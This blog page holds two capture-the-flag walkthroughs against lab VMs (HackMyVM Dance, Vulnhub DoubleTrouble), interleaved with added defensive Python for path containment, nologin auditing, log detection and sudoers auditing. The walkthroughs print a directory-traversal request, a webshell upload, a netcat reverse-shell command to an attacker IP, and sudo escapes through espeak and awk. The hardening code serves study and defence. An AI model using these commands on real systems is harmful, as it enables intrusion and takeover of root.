Daily archive: September 14, 2021

HackMyVm Dance Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Dance

Scan ports first.

```bash
nmap -sV -sC -p- -oN ports.log 192.168.56.100
...
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
...
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
...
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

Scan port 80 with gobuster; it finds /music.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
/index.html           (Status: 200) [Size: 121]
/music                (Status: 301) [Size: 169] [--> http://192.168.56.100/music/]
```

Open /music in a web browser and check the page information: it is a web app called Musicco.

Search for a Musicco exploit.

```bash
~ searchsploit musicco
Exploit Title                                 | Path
Musicco 2.0.0 - Arbitrary Directory Download  | php/webapps/45830.txt
```

With this exploit we can download a whole directory (here the web root) as a zip file.

```bash
~ wget 'http://192.168.56.100/music/?getAlbum&parent=../../&album=var' -O var.zip
```
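
Why that request works: the album path is joined onto the music root with no check that the result still lies under it, so parent=../../ simply walks out of the tree. The following is an added example (not Musicco's code and not from the original post) showing the vulnerable join beside a hardened version; MUSIC_ROOT and the function names are assumptions.

```python
import posixpath

# Constructed music root for the demo (the page's config.php sets
# musicRoot = 'music'; its absolute location is an assumption here).
MUSIC_ROOT = "/srv/musicco/music"


def unsafe_album_path(root, parent, album):
    """The vulnerable pattern: user-supplied parent and album are joined
    onto the root with no containment check, so parent='../../' walks out
    of the tree and the caller zips whatever directory it lands on."""
    return posixpath.normpath(posixpath.join(root, parent, album))


def safe_album_path(root, parent, album):
    """Hardened form: build the same path, normalise it, then require that
    it still lies inside the root. Returns the path if so, None otherwise.
    posixpath keeps this pure string logic so it runs offline; a real
    handler should also realpath() both sides to defeat symlinks."""
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, parent, album))
    try:
        # commonpath() compares whole components, so '/srv/musicco/music2'
        # is correctly rejected where a startswith() check would accept it.
        contained = posixpath.commonpath([root, candidate]) == root
    except ValueError:
        # Mixing absolute and relative paths cannot be contained; reject.
        contained = False
    return candidate if contained else None


def classify_requests(requests, root=MUSIC_ROOT):
    """Run a batch of (parent, album) query pairs through the hardened check
    and report which would be served; handy as a unit test for the handler."""
    return {
        (parent, album): "allowed" if safe_album_path(root, parent, album) else "rejected"
        for parent, album in requests
    }


if __name__ == "__main__":
    # The page's request plus a few constructed variants.
    sample = [("../../", "var"), ("", "rock"), ("", "../music2"), ("", "/etc")]
    print("unsafe join:", unsafe_album_path(MUSIC_ROOT, "../../", "var"))
    for key, verdict in classify_requests(sample).items():
        print(key, verdict)
```

The commonpath comparison is the important part: it rejects a sibling directory whose name merely starts with the root name, and an absolute album value, which posixpath.join would otherwise let replace the root entirely.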

Unzip var.zip and check music/config.php, which contains several credentials.

```bash
~ cat config.php
<?php
$_CONFIG['saveConfig'] = '';
$_CONFIG['users'] = array(
    array('admin', 'admin', 'true'),
    array('guest', 'guest', 'false'),
    array('aria', 'seraphim', 'false'),
    array('alice', 'rememberyou', 'false'),
    array('ava', 'password', 'false'),
    array('alba', 'thehostof', 'false'),
);
$_CONFIG['lang'] = 'en';
$_CONFIG['musicRoot'] = 'music';
$_CONFIG['coverFileName'] = 'folder';
$_CONFIG['coverExtension'] = '.png';
$_CONFIG['loadLyricsFromFile'] = 'on';
$_CONFIG['downLoadMissingCovers'] = 'on';
$_CONFIG['searchEngine'] = '';
$_CONFIG['imageSearchEngine'] = '';
?>
```

With these credentials we can log in over SSH as user aria.

```bash
~ ssh aria@192.168.56.100
aria@dance:~$ id
uid=1000(aria) gid=1000(aria) groups=1000(aria),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
```

Another user is alba, but its login shell is nologin.

```bash
aria@dance:~$ cat /etc/passwd | grep alba
alba:x:1001:1001:,,,:/home/alba:/usr/sbin/nologin
```

A nologin shell only blocks a normal login; su -s lets us pick the shell ourselves, so we can still switch to alba with her password from config.php.

```bash
aria@dance:~$ su -s /bin/bash alba
Password:
alba@dance:/home/aria$ id
uid=1001(alba) gid=1001(alba) groups=1001(alba)
```
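
The lesson for defenders is that /usr/sbin/nologin is not an account lock: it is bypassed by su -s as long as the password still works, so the fix is to lock the password (passwd -l) rather than rely on the shell. As an added example (not from the original post), this audit flags accounts with a nologin shell whose password hash is still usable; the passwd and shadow excerpts are constructed samples modelled on the alba entry above.

```python
# Constructed /etc/passwd and /etc/shadow excerpts modelled on the page's
# alba entry; the hashes are placeholders, not real data.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
aria:x:1000:1000:,,,:/home/aria:/bin/bash
alba:x:1001:1001:,,,:/home/alba:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
"""

SHADOW = """\
root:$6$placeholder$hash1:18871:0:99999:7:::
aria:$6$placeholder$hash2:18871:0:99999:7:::
alba:$6$placeholder$hash3:18871:0:99999:7:::
www-data:*:18871:0:99999:7:::
backup:!$6$placeholder$hash4:18871:0:99999:7:::
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def parse_colon_file(text):
    """Map the first field (username) to the full field list of each line."""
    rows = {}
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            fields = line.split(":")
            rows[fields[0]] = fields
    return rows


def password_usable(hash_field):
    """True unless the hash is locked: passwd -l / usermod -L prefix it with
    '!', and '*' or '!!' mean no password was ever set. An empty field is
    reported as usable because it may permit a login with no password at all."""
    return not hash_field.startswith(("!", "*"))


def audit_nologin_accounts(passwd_text=PASSWD, shadow_text=SHADOW):
    """Return users whose shell is a nologin shell but whose password would
    still be accepted by 'su -s /bin/bash <user>'."""
    passwd = parse_colon_file(passwd_text)
    shadow = parse_colon_file(shadow_text)
    findings = []
    for user, fields in passwd.items():
        if len(fields) < 7 or fields[6] not in NOLOGIN_SHELLS:
            continue
        shadow_fields = shadow.get(user)
        if shadow_fields is None:
            continue  # no shadow entry means nothing to authenticate against
        if password_usable(shadow_fields[1]):
            findings.append(user)
    return sorted(findings)


if __name__ == "__main__":
    for user in audit_nologin_accounts():
        print(f"{user}: nologin shell but password still usable; lock it with passwd -l")
```

On a real host, read the two files with root privileges and feed their contents in; www-data and backup in the sample are correctly skipped because their hashes are locked.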

Check sudo -l.

```bash
alba@dance:/home/aria$ sudo -l
Matching Defaults entries for alba on dance:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User alba may run the following commands on dance:
    (root) NOPASSWD: /usr/bin/espeak
```

The last step is to use espeak, running as root, to read /root/root.txt: -f reads the file, -q suppresses the audio, and -X prints the translation trace, which shows the text.

```bash
alba@dance:/home/aria$ sudo /usr/bin/espeak -f /root/root.txt -q -X
Translate 'rootflag'
...
```

Vulnhub DoubleTrouble Walkthrough

https://www.vulnhub.com/entry/doubletrouble-1,743/

Scan port 80 with gobuster.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
===============================================================
/uploads              (Status: 301) [Size: 318] [--> http://192.168.56.100/uploads/]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.100/images/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.100/css/]
/template             (Status: 301) [Size: 319] [--> http://192.168.56.100/template/]
/core                 (Status: 301) [Size: 315] [--> http://192.168.56.100/core/]
/install              (Status: 301) [Size: 318] [--> http://192.168.56.100/install/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]
/index.php            (Status: 200) [Size: 5814]
/check.php            (Status: 200) [Size: 0]
/sf                   (Status: 301) [Size: 313] [--> http://192.168.56.100/sf/]
/readme.txt           (Status: 200) [Size: 470]
/robots.txt           (Status: 200) [Size: 26]
/secret               (Status: 301) [Size: 317] [--> http://192.168.56.100/secret/]
```

From /secret, download doubletrouble.jpg; stegseek cracks the passphrase and extracts creds.txt.

```bash
~ stegseek --crack -sf doubletrouble.jpg
StegSeek version 0.5
Progress: 2.00% (2794835 bytes)
[i] --> Found passphrase: "92camaro"
[i] Original filename: "creds.txt"
[i] Extracting to "doubletrouble.jpg.out"
~ mv doubletrouble.jpg.out creds.txt
~ cat creds.txt
otisrush@localhost.com
otis666
```

The site runs qdPM, so search for an exploit.

```bash
~ searchsploit qdPM
Exploit Title                                          | Path
...
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) | php/webapps/50175.py
...
```

Use the PoC to upload a backdoor.

```bash
~ python3 50175.py --host 'http://192.168.56.100/' -u otisrush@localhost.com -p otis666

You are not able to use the designated admin account because they do not have a myAccount page.

Backdoor uploaded at - > http://192.168.56.100//uploads/users/?cmd=whoami
```

Check that the backdoor works.

```bash
~ curl 'http://192.168.56.100/uploads/users/148232-backdoor.php?cmd=whoami'
<pre>www-data
</pre>
```

Get a reverse shell.

```bash
~ curl 'http://192.168.56.100/uploads/users/148232-backdoor.php?cmd=nc%20192.168.56.150%201234%20-e%20/bin/bash'

~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:53330.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@doubletrouble:/var/www/html/uploads/users$
```
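
Both walkthroughs leave an obvious trace in the web server's access log: the Musicco request with parent=../../ in the Dance box, and here a PHP file under /uploads/ being called with a cmd= parameter. As an added example (not from the original post), this is a small detector for those two patterns, run over constructed nginx combined-format lines; the log format, file names and client addresses are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed nginx combined-format lines modelled on the requests in the
# two walkthroughs (not a real log; times, sizes and agents are invented).
SAMPLE_LOG = [
    '192.168.56.150 - - [14/Sep/2021:10:18:29 +0000] "GET /music/?getAlbum&parent=../../&album=var HTTP/1.1" 200 51234 "-" "Wget/1.21"',
    '192.168.56.150 - - [14/Sep/2021:14:55:01 +0000] "GET /uploads/users/148232-backdoor.php?cmd=whoami HTTP/1.1" 200 25 "-" "curl/7.74.0"',
    '192.168.56.150 - - [14/Sep/2021:14:56:10 +0000] "GET /uploads/users/148232-backdoor.php?cmd=nc%20192.168.56.150%201234%20-e%20/bin/bash HTTP/1.1" 200 0 "-" "curl/7.74.0"',
    '10.0.0.5 - - [14/Sep/2021:15:00:00 +0000] "GET /music/?getAlbum&parent=&album=rock HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [14/Sep/2021:15:01:00 +0000] "GET /uploads/users/avatar.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# '..' as a whole component following a separator, '=', '&' or '?'; this
# covers parent=../../ as well as /a/../b, and is applied to decoded text.
TRAVERSAL_RE = re.compile(r'(?:^|[/\\=&?])\.\.(?:[/\\]|$)')
# Any PHP file served from the upload tree is already a policy violation.
UPLOAD_PHP_RE = re.compile(r'^/uploads/.*\.php\d*$', re.IGNORECASE)


def parse_line(line):
    """Split one access-log line into fields, decoding the request target."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = unquote(parts.path)
    rec["query"] = unquote(parts.query)
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def detect(lines):
    """Return (rule, client_ip, detail) tuples for suspicious requests."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        # Decode once more so double-encoded %252e%252e is caught as well.
        decoded = unquote(rec["path"] + "?" + rec["query"])
        if TRAVERSAL_RE.search(decoded):
            alerts.append(("path-traversal", rec["ip"], rec["target"]))
        if UPLOAD_PHP_RE.match(rec["path"]):
            cmd = rec["params"].get("cmd")
            if cmd:
                # parse_qs has already percent-decoded the value.
                alerts.append(("webshell-command", rec["ip"], cmd[0]))
            else:
                alerts.append(("php-in-uploads", rec["ip"], rec["path"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(*alert)
```

The php-in-uploads rule fires even without a cmd= parameter because the right server-side control is to never execute scripts from an upload directory at all (nginx: no PHP location match under /uploads/); the webshell-command rule then records the decoded command for the incident timeline.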

Check sudo -l.

```bash
www-data@doubletrouble:/home$ ls -la
ls -la
total 8
drwxr-xr-x  2 root root 4096 Sep 11 13:51 .
drwxr-xr-x 18 root root 4096 Dec 17  2020 ..
www-data@doubletrouble:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on doubletrouble:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on doubletrouble:
    (ALL : ALL) NOPASSWD: /usr/bin/awk
```

Get root.

```bash
www-data@doubletrouble:/home$ sudo awk 'BEGIN {system("/bin/sh")}'
sudo awk 'BEGIN {system("/bin/sh")}'
# id;hostname
id;hostname
uid=0(root) gid=0(root) groups=0(root)
doubletrouble
```
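
Both boxes fall to the same misconfiguration: a sudoers entry that lets a low-privilege user run, as root and without a password, a binary that can read arbitrary files or spawn a shell (espeak on Dance, awk here). As an added example (not from the original post), this script parses sudo -l output like the two shown above and flags such entries; RISKY_BINARIES holds only the page's two examples plus awk's common variants and is meant to be extended from your own policy.

```python
import os
import re

# sudo -l output transcribed from the two walkthroughs, plus one constructed
# benign entry for contrast.
SUDO_L_DANCE = r"""
Matching Defaults entries for alba on dance:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User alba may run the following commands on dance:
    (root) NOPASSWD: /usr/bin/espeak
"""

SUDO_L_DOUBLETROUBLE = r"""
User www-data may run the following commands on doubletrouble:
    (ALL : ALL) NOPASSWD: /usr/bin/awk
"""

SUDO_L_BENIGN = r"""
User deploy may run the following commands on web01:
    (root) /usr/local/bin/restart-app.sh
"""

# Binaries the page shows being used to read files or spawn a shell as
# root; extend from your own policy (interpreters and editors belong here).
RISKY_BINARIES = {"awk", "gawk", "mawk", "espeak"}

# '(runas) TAG: TAG: command' as printed by sudo -l.
ENTRY_RE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$')


def parse_sudo_l(text):
    """Extract (runas user, tag set, command) from 'sudo -l' output."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()  # '(ALL : ALL)' -> 'ALL'
        tags = {t.rstrip(":") for t in re.findall(r"[A-Z]+:", m.group("tags"))}
        entries.append({"runas": runas, "tags": tags, "cmd": m.group("cmd").strip()})
    return entries


def audit_sudo(text, risky=RISKY_BINARIES):
    """Return (severity, command) for entries that grant root through a
    binary with a known shell escape or file-read capability."""
    findings = []
    for entry in parse_sudo_l(text):
        if entry["runas"] not in ("root", "ALL"):
            continue
        binary = os.path.basename(entry["cmd"].split()[0])
        if entry["cmd"] == "ALL" or binary in risky:
            severity = "critical" if "NOPASSWD" in entry["tags"] else "high"
            findings.append((severity, entry["cmd"]))
    return findings


if __name__ == "__main__":
    for name, text in [("dance", SUDO_L_DANCE), ("doubletrouble", SUDO_L_DOUBLETROUBLE), ("benign", SUDO_L_BENIGN)]:
        print(name, audit_sudo(text))
```

The remediation is to remove the entry or replace the binary with a wrapper script that takes no user-controlled arguments, and to avoid NOPASSWD for anything that can open a file or start a subprocess.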